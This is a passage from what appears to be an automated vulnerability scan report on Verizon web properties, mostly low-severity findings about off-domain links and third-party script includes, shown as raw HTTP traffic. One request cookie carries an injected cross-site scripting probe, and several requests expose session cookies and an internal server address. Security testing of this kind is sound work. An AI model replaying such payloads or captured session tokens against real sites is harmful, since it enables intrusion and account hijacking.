AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; 
NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA07V
Content-Type: text/html; charset=utf-8
Content-Length: 16234
Cache-Control: private, max-age=0
Date: Mon, 05 Sep 2011 22:42:03 GMT
Connection: close

<div id="placeholder">
   <input name="ctl00$hCSCUId" type="hidden" id="ctl00_hCSCUId" />
<input type="hidden" id="hdnCSDTV" name="hdnCSDTV" />
<div class="PadL10 CB">
<div id="ctl00_divhdrCS" c
...[SNIP]...
<div class="Fl Wid110 LkLnH" id="csDTV" style="display: none; width: 100px">
<a id="a1" href="http://support.directv.com/">Overview</a><br />
<a id="a2" href="http://www.directv.com/DTVAPP/epg/theGuide.jsp">Guide</a><br />
<a id="a3" href="http://www.directv.com/DTVAPP/content/equipment/receivers">Receivers</a><br />
<a id="a4" href="http://www.directv.com/DTVAPP/content/equipment/remotes">Remote Controls</a><br />
<a id="a5" href="http://www.directv.com/DTVAPP/content/equipment/accessories">Other
Hardware</a><br />
<a id="a6" href="http://support.directv.com/app/troubleshooting/p/21">Troubleshooting</a><br />
<a id="a7" href="http://www.directv.com/DTVAPP/content/contact_us">Contact Us</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://support.vzw.com/">Support</a></div><div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://support.vzw.com/phones/">Troubleshooting</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://support.vzw.com/phones/">Phone Manual</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://www.verizonwireless.com/multimedia/voicemail/vmdemo_v1/index.html">How to Use Voice Mail</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://support.vzw.com/features/view_all.html">How to Use Features</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://www.verizonwireless.com/b2c/accountholder/store/controller?item=addalineItem&action=displaysplash">Add a Line</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://www.verizonwireless.com/b2c/accountholder/store/controller?item=callingplanItem&action=displayMDN">Change Calling Plan</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do">Add/Change Features</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="http://support.vzw.com/billing/top_questions.html#item6">How do I check my balance?</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="http://support.vzw.com/billing/top_questions.html#item7">How do I check my minutes used?</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="http://support.vzw.com/billing/top_questions.html#item8">How do I upgrade my equipment?</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="http://support.vzw.com/billing/top_questions.html#item9">What do I do if my phone is lost or stolen?</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="http://support.vzw.com/billing/top_questions.html#item10">How do I download ring tones?</a>
...[SNIP]...
<span class="linkTextNormal"><a CheckForLite="true" href="http://support.vzw.com/billing/?lid=//global//support//billing+and+account">More</a>
...[SNIP]...
<div class="LkLnH" id="divW" style="display: none">
<a href=http://community.vzw.com/t5/Other/QUESTION-ABOUT-CERTIFIED-PRE-OWNED/td-p/652419>QUESTION ABOUT CERTIFIED PRE-OWNED!</a><br><a href=http://community.vzw.com/t5/DROID-Charge-by-Samsung/Droid-Charge-Communication-errors-No-network-coverage/td-p/648943>Droid Charge - Communication errors No network coverage</a><br><a href=http://community.vzw.com/t5/Media-Store/QUESTION-ABOUT-SANDISK-MEMORY-CARDS-FOR-PHONES/td-p/652347>QUESTION ABOUT SANDISK MEMORY CARDS FOR PHONES!</a><br><a href=http://community.vzw.com/t5/ThunderBolt-by-HTC/Unknown-Caller/td-p/652341>Unknown Caller</a><br><a href=http://community.vzw.com/t5/iPhone-4/New-Apps-for-iphone4/td-p/650309>New Apps for iphone4</a><br><a href=http://community.vzw.com/t5/Media-Store/Default-Ringback-Tone-Won-t-Delete/td-p/648501>Default Ringback Tone Won't Delete!</a>
...[SNIP]...

15.47. http://www22.verizon.com/residential/fiostv

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/fiostv

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /residential/fiostv?CMP=DMC-CV090057 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.verizon.com/fiostv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; NSC_xxx22_tqmbu_mcw=ffffffff895bc66845525d5f4f58455e445a4a423660; vsrecentsearches=wss~xss~xss%20sq~~

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 131188
Expires: Mon, 05 Sep 2011 22:18:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:18:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 04-Sep-2011 22:18:31 GMT; path=/
Set-Cookie: ContextInfo_State=CA; path=/
Set-Cookie: BTagRequired=; expires=Sat, 05-Sep-1981 22:18:31 GMT; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 04-Sep-2011 22:18:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 04-Sep-2011 22:18:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 04-Sep-2011 22:18:31 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<LI><A style="WIDTH: 63px" id=GHWireless title="Verizon Wireless" href="http://www.verizonwireless.com/" name=&lid=hp_wireless_tab>Wireless</A>
...[SNIP]...
<LI><A href="http://www.verizonwireless.com/b2c/index.html" name=&lid=overlay_phone_wireless><IMG alt="" src="/Content/Commonfiles/images/globalheader/new_header/i/wireless.gif">
...[SNIP]...
</DIV><EMBED height=385 type=application/x-shockwave-flash width=640 src=http://www.youtube.com/v/e7VJmt0Nz7o?version=3&amp;hl=en_US allowscriptaccess="always" allowfullscreen="true"></DIV>
...[SNIP]...
</DIV><EMBED height=385 type=application/x-shockwave-flash width=640 src=http://www.youtube.com/v/BeKPG_bfV7M?version=3&amp;hl=en_US allowscriptaccess="always" allowfullscreen="true"></DIV>
...[SNIP]...
</DIV><EMBED height=385 type=application/x-shockwave-flash width=640 src=http://www.youtube.com/v/yMzKLp3wyCs?version=3&amp;hl=en_US allowscriptaccess="always" allowfullscreen="true"></DIV>
...[SNIP]...
<DIV class="col12 clear icons"><A href="http://www.bbbonline.org/cks.asp?id=108072593112" name=&lid=hp_res_footer_bbb_logo target=_blank><IMG alt="Click to verify BBB accreditation and to see a BBB report." src="/Content/LearnShop/Images/footer/bbb.jpg"></A><A href="http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101" name=&lid=hp_res_footer_truste_logo target=_blank><IMG class=bright alt="Reviewed by TRUSTe site privacy statement." src="/Content/LearnShop/Images/footer/truste.jpg">
...[SNIP]...
<LI><A href="http://www.thinkfinity.org/">Verizon Thinkfinity</A>
...[SNIP]...
</script>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=fiost917;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<!--FiOS TV_Landing Page-->
<script type="text/javascript" src="http://d1qpxk1wfeh8v1.cloudfront.net/tags/tt16_1002.js"></script>
...[SNIP]...

15.48. https://www22.verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /?lid=//global//residential HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 128679
Cache-Control: private, max-age=1800
Date: Mon, 05 Sep 2011 22:19:42 GMT
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head >
<title>Verizon | Broadband (DSL) Internet Service, Cable TV (Digital TV,
...[SNIP]...
<!--document.domain = "www26.verizon.com" -->
<iframe src="https://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=1?" width="1" height="1"

frameborder="0">
</iframe>
...[SNIP]...

15.49. https://www22.verizon.com/ForYourHome/VZRepair/vziha/js/jslib.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/VZRepair/vziha/js/jslib.axd

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ForYourHome/VZRepair/vziha/js/jslib.axd?d=recaptcha_ajax.js&v=2.2.0 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; CP=null*; 
refURL=http://www22.verizon.com/residentialhelp/fiostv; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 08 Oct 2010 19:50:14 GMT
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Content-Length: 25650
Expires: Mon, 05 Sep 2011 22:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:40 GMT
Connection: keep-alive

/*recaptcha_ajax.js*/

var RecaptchaTemplates={};RecaptchaTemplates.VertHtml='<table id="recaptcha_table" class="recaptchatable" > <tr> <td colspan="6" class=\'recaptcha_r1_c1\'></td> </tr> <tr> <td
...[SNIP]...
udioCaptchaHtml:function(){var a=Recaptcha,b=RecaptchaState,c=b.server+"image?c="+b.challenge;if(c.indexOf("https://")==0)c="http://"+c.substring(8);b=b.server+"/img/audiocaptcha.swf?v2";a=a._is_ie()?'<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="audiocaptcha" width="0" height="0" codebase="https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param name="movie" value="'+b+'" />
...[SNIP]...

16. Cross-domain script include
There are 85 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


16.1. https://b2b.verizonwireless.com/b2b/commerce/privacy.go

Summary

Severity:   Information
Confidence:   Certain
Host:   https://b2b.verizonwireless.com
Path:   /b2b/commerce/privacy.go

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2b/commerce/privacy.go HTTP/1.1
Host: b2b.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 22:34:41 GMT
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="ALL DSP COR HISa OTPa OUR BUS UNI PUR COM NAV INT"
x-wily-servlet: Clear appServerIp=10.170.176.64&agentName=puma23&servletName=DispatcherServlet&agentHost=obswbbizzap65&agentProcess=COMM
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
x-wily-info: Clear guid=3BBAAAFA0AAAB0403CD121F020CB8EFE
Content-Length: 40953

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="ht
...[SNIP]...
<meta http-equiv="cache-control" content="no-cache, must-revalidate"/>


<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/commerce/javascript/common/flashDetector.js">
</script>
<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/commerce/javascript/common/vzw_commerce.js">
</script>
<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/commerce/javascript/common/forms.js">
</script>
<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/commerce/javascript/common/cookies.js">
</script>
...[SNIP]...
</script>


<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/commerce/javascript/common/ajaxOverlay.js">
</script>
<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/commerce/hbx/hbx_custom.js">
</script>

<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/core/scripts/mootools.js">
</script>
   

                       <script type="text/javascript"
           src="https://scache.vzw.com/mybiz/commerce/hbx/hbx_default_header.js">
</script>
   

<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/selfservice/scripts/rga_dd.js">
</script>
<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/selfservice/scripts/commerce.js">
</script>
...[SNIP]...
</div>
   
   
   <script type="text/javascript" defer="defer" src="https://scache.vzw.com/mybiz/core/scripts/lib.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/mybiz/core/scripts/vzw_lib.js"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="https://scache.vzw.com/mybiz/commerce/hbx/hbx.js"></script>
...[SNIP]...

16.2. http://b2b.vzw.com/industrysolutions/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b2b.vzw.com
Path:   /industrysolutions/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /industrysolutions/index.html HTTP/1.1
Host: b2b.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.3
Content-Type: text/html
X-Cacheable: NO: !obj.cacheable
Content-Length: 20859
Date: Mon, 05 Sep 2011 21:56:40 GMT
X-Varnish: 1491768482
Age: 0
Via: 1.1 varnish
Connection: keep-alive



...[SNIP]...
</script><script language="javascript1.1" src="https://www.verizonwireless.com/js/shared/hbx/hbx.js"></script>
...[SNIP]...

16.3. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1qpxk1wfeh8v1.cloudfront.net
Path:   /tags/1234568496.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tags/1234568496.html HTTP/1.1
Host: d1qpxk1wfeh8v1.cloudfront.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential

Response

HTTP/1.0 200 OK
x-amz-id-2: B0nY08H2jpnHjn/SW41fxJTVypUCPMOogChBFehqE69xiZnUUjh9mvHcrg7qazQh
x-amz-request-id: 370753916E2BAB25
Date: Sat, 20 Aug 2011 03:01:56 GMT
x-amz-meta-s3fox-filesize: 2507
x-amz-meta-s3fox-modifiedtime: 1311270024611
Last-Modified: Thu, 21 Jul 2011 17:40:29 GMT
ETag: "6fc159b6442ca664eb0709a8e343aad7"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 2507
Server: AmazonS3
Age: 45636
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 21cfe9b1f85d28e01ed1d4ecf31011793c8e7dc0d4825f268d693e21748867c3c4fee5590cf14602
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 3db863a26c95a97ff57e55bdbbf10793.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<html>
<head>
</head>
<body>

<!-- Insert any code or tags between here -->
<!-- "Verizon" c/o "Cadreon", segment: 'TotalTag_Verizon.com homepage' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=14055&partnerID=134&clientID=2540&key=segment&returnType=js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://r.turn.com/server/beacon_call.js?b2=zWOV_b2-olxW30r-HvgJ-W8JL5NcaiTtCBKWjV3AS6GHDRKM8X_rBRqVIW4_D0WxJkwj0wgBX_MIOECGKTmV8g">
</script>
...[SNIP]...
<img src="http://ad.yieldmanager.com/pixel?id=1195985&id=1195982&id=103815&t=2" width="1" height="1" />

<script type="text/javascript" src="http://cti.w55c.net/ct/ct-798466b25b8841b28752394c7d7a01b8.js"></script>
...[SNIP]...

16.4. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571455.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1qpxk1wfeh8v1.cloudfront.net
Path:   /tags/1234571455.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tags/1234571455.html HTTP/1.1
Host: d1qpxk1wfeh8v1.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/overview.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: 383mtG+vKWCru1G6cHTPDq3okRLkcpaSCR4eB7nPE2OOt4eTsLyWbJYJsNhbyKrw
x-amz-request-id: 820B35F0E6EBA1BE
Date: Fri, 26 Aug 2011 18:21:13 GMT
x-amz-meta-s3fox-filesize: 1603
x-amz-meta-s3fox-modifiedtime: 1314142890848
Last-Modified: Wed, 24 Aug 2011 20:01:20 GMT
ETag: "7f3bbce8230dcfe1e1c6b3b266c9bed8"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 1603
Server: AmazonS3
Age: 10813
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 6155803d16c8482abd205043b94b6a9de183a9c9a7596054019bb1d544e25453d8c6d93c77949fa1
Via: 1.0 db26aad8eddbf74ac3abe77abd5de63f.cloudfront.net:11180 (CloudFront), 1.0 3db863a26c95a97ff57e55bdbbf10793.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<html>
<head>
</head>
<body>

<!-- Insert any code or tags between here -->

<html>
<head>
</head>
<body>

<!-- Insert any code or tags between here -->

<!-- "Verizon Small Business" c/o "Cadreon", segment: 'SMB - Voice_Lead' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=72675&partnerID=134&clientID=2690&key=segment&returnType=js"></script>
...[SNIP]...
</script>
